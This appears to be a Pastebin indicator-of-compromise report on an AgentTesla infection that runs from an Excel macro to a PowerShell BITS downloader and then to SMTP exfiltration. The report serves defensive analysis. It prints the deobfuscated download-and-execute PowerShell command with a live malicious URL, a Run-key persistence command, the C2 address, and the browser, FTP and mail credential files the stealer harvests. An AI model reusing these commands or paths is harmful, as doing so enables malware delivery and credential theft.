Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #AgentTesla #X97M #Downloader #Powershell #BITS #exfil587
- https://pastebin.com/fN11F9Gq
- previous_contact:
- 10/02/21 https://pastebin.com/9JXvM5ix
- 07/12/20 https://pastebin.com/20AVUqZ6
- 04/12/20 https://pastebin.com/PYFMBfkg
- 15/06/20 https://pastebin.com/pma5MQAW [!] InstallUtil.exe
- 12/06/20 https://pastebin.com/SKNts0Es
- 29/10/19 https://pastebin.com/RinpBPvy
- 03/09/19 https://pastebin.com/zhJvDz8M
- 09/01/19 https://pastebin.com/MdDfZDdb
- 16/10/18 https://pastebin.com/d5DxTRrB
- 04/10/18 https://pastebin.com/JYShuXn4
- 11/10/18 https://pastebin.com/bkCSvJvM
- FAQ:
- https://radetskiy.wordpress.com/2020/06/15/ioc_agenttesla_150620/
- https://radetskiy.wordpress.com/2018/03/13/ioc_lnk_bits_130318/
- attack_vector
- --------------
- email attach (xls) > macro > powershell > BITS > GET .pdf(EXE) > exfil to 198.54.126.101:587
- email_headers
- --------------
- n/a
- # # # # # # # #
- files
- # # # # # # # #
- SHA-256 3762daf78d104add5df228727793ceefd5794c142edd39913be21526ddaeda4c
- File name PO00004423.xls [ Microsoft Excel sheet ]
- File size 124.50 KB (127488 bytes)
- SHA-256 eebbc48f5c8cd470c709c229a4719e5c61ea6b1769b73b397bf110322ea92ae0
- File name IMG_Scanned_6713.pdf [ .NET executable ]
- File size 926.61 KB (948848 bytes)
- SHA-256 4c7ce63cd966e72e5d94f6dc8b0f82cec35b88b1a8d24305c52a7106cdad5ad9
- File name InstallUtil.exe [ .NET executable ] - .NET Framework installation utility ! corelated with #Agenttesla_150620 https://pastebin.com/pma5MQAW
- File size 39.67 KB (40624 bytes)
- # # # # # # # #
- activity
- # # # # # # # #
- PL_SCR [BITS only!] http://studioartarquitetura.com.br/wp-includes/ID3/1/IMG_Scanned_6713.pdf
- C2 198.54.126.101:587
- netwrk [wireshark_filter: http.request.method==HEAD||http.request.method==GET||ssl||tcp.port==587]
- --------------
- 177.12.164.98 studioartarquitetura.com.br HEAD /wp-includes/ID3/1/IMG_Scanned_6713.pdf HTTP/1.1 Microsoft BITS/7.5
- 177.12.164.98 studioartarquitetura.com.br GET /wp-includes/ID3/1/IMG_Scanned_6713.pdf HTTP/1.1 Microsoft BITS/7.5
- 142.250.102.106 Client Hello
- 142.250.102.106 Application Data
- 198.54.126.101 50809 → 587 [ACK] Seq=1 Ack=1 Win=64240 Len=0
- 198.54.126.101 C: AUTH login User: dHdva2V5c0Bub2JldHR3by54eXo=
- 198.54.126.101 C: MAIL FROM:<twokeys@nobettwo.xyz>
- comp
- --------------
- svchost.exe 3088 TCP 177.12.164.98 80 ESTABLISHED
- dvaurxb.exe 2820 TCP 142.250.102.106 443 ESTABLISHED
- pou.exe 3952 TCP 142.250.102.106 443 ESTABLISHED
- InstallUtil.exe 252 TCP 198.54.126.101 587 ESTABLISHED
- proc
- --------------
- C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Import-Module BitsTransfer; Start-BitsTransfer -Source "http://studioartarquitetura.com.br/wp-includes/ID3/1/IMG_Scanned_6713.pdf" -Destination "$env:tmp\\dvaurxb.exe"; Invoke-Item "$env:tmp\\dvaurxb.exe"; exit
- C:\tmp\dvaurxb.exe
- C:\Windows\SysWOW64\cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "htwe" /t REG_SZ /d "C:\Users\operator\AppData\Roaming\pou.exe"
- C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "htwe" /t REG_SZ /d "C:\Users\operator\AppData\Roaming\pou.exe"
- C:\Users\operator\AppData\Roaming\pou.exe
- C:\tmp\InstallUtil.exe
- persist
- --------------
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 09.02.2021 10:15
- htwe E8?:2<6?J;2AB@8 39;:94G29HA?3C:E52EJ>
- c:\users\operator\appdata\roaming\pou.exe 07.05.1979 4:21
- drop
- --------------
- %temp%\35618171.od
- %temp%\dvaurxb.exe
- %temp%\BITA9C9.tmp
- C:\Users\operator\AppData\Roaming\pou.exe
- %temp%\InstallUtil.exe
- # # # # # # # #
- additional info
- # # # # # # # #
- Deobfuscated macro
- --------------
- import-module bitstransfer
- start-bitstransfer -source "http://studioartarquitetura.com.br/wp-includes/ID3/1/IMG_Scanned_6713.pdf" -destination $env:tmp
- dvaurxb.exe
- invoke-item $env:tmp
- dvaurxb.exe
- exit
- !Steals private information from local Internet browsers
- --------------
- C:\Users\operator\AppData\Roaming\Opera Software\Opera Stable
- C:\Users\operator\AppData\Roaming\Mozilla\Firefox\profiles.ini
- C:\Users\operator\AppData\Roaming\Mozilla\Firefox\Profiles\axdea46y.default\key4.db
- C:\Users\operator\AppData\Roaming\Mozilla\Firefox\Profiles\axdea46y.default\logins.json
- C:\Users\operator\AppData\Roaming\Opera Mail\Opera Mail\wand.dat
- C:\Users\operator\AppData\Roaming\Comodo\IceDragon\profiles.ini
- !Harvests credentials from local FTP client softwares
- --------------
- C:\Users\operator\AppData\Roaming\FTPGetter\servers.xml
- C:\Users\operator\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
- C:\Users\operator\AppData\Roaming\CoreFTP\sites.idx
- !Harvests information related to installed mail clients
- --------------
- C:\Users\operator\AppData\Roaming\Postbox\profiles.ini
- C:\Users\operator\AppData\Roaming\eM Client
- C:\Users\operator\AppData\Roaming\Thunderbird\profiles.ini
- C:\Users\operator\AppData\Roaming\The Bat!
- C:\Users\operator\AppData\Roaming\Claws-mail\clawsrc
- C:\Users\operator\AppData\Roaming\Pocomail\accounts.ini
- # # # # # # # #
- VT & Intezer
- # # # # # # # #
- https://www.virustotal.com/gui/file/3762daf78d104add5df228727793ceefd5794c142edd39913be21526ddaeda4c/details
- https://www.virustotal.com/gui/file/eebbc48f5c8cd470c709c229a4719e5c61ea6b1769b73b397bf110322ea92ae0/details
- https://analyze.intezer.com/analyses/4a4d284b-c91d-4657-8211-6046d723d0c3
- https://www.virustotal.com/gui/file/4c7ce63cd966e72e5d94f6dc8b0f82cec35b88b1a8d24305c52a7106cdad5ad9/details
- https://analyze.intezer.com/analyses/f1a2a705-c2e6-417f-b855-0eab53ce7973
- VR
Add Comment
Please, Sign In to add comment